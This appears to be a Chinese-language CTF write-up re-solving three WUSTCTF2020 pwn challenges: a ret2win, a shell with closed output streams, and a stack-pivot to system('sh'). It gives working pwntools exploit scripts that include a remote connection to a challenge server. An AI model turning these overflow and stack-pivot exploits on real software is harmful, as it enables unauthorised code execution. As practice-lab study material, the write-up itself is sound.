0%

WUSTCTF2020复现

今日在buu水水分,遇到了题目👴就顺便复现一下WUSTCTF

getshell

简单的ret2win
exp:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.log_level='debug'
context.arch = 'i386'
#p=process('./wustctf2020_getshell')
p=remote('node3.buuoj.cn',25756)
elf=ELF('./wustctf2020_getshell')
backdoor=0x804851b

p.recv()
payload='a'*0x1c+p32(backdoor)
p.sendline(payload)
p.interactive()

closed

直接提供shell,但是标准错误,标准输出流全关,需要将输出重定向到标准输入流
nc上之后直接

1
cat flag >&0

getshell_2

栈迁移:使用已有的read函数加上bss地址,由于没有其他字符串,可以用system(‘sh’)来getshell
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level='debug'
context.arch = 'i386'
p=process('./wustctf2020_getshell_2')
#p=remote('node3.buuoj.cn',25756)
elf=ELF('./wustctf2020_getshell_2')
backdoor=0x804851b

sh_addr=0x8048670
read_addr=0x804858B
read_addr_2=0x804858D
system_addr=0x80483E0
bss=0x804a040+0x300
leave_ret=0x08048488
p.recv()
payload='a'*0x18+p32(bss+0x18)+p32(read_addr)
p.sendline(payload)
payload='aaaa'+p32(system_addr)+p32(0)+p32(sh_addr)+p32(0)*2+p32(bss)+p32(leave_ret)
#here to fill 0x18 size 这里bss前要填充0x18个字符
p.sendline(payload)
p.interactive()
好饿啊,早知道不学安全了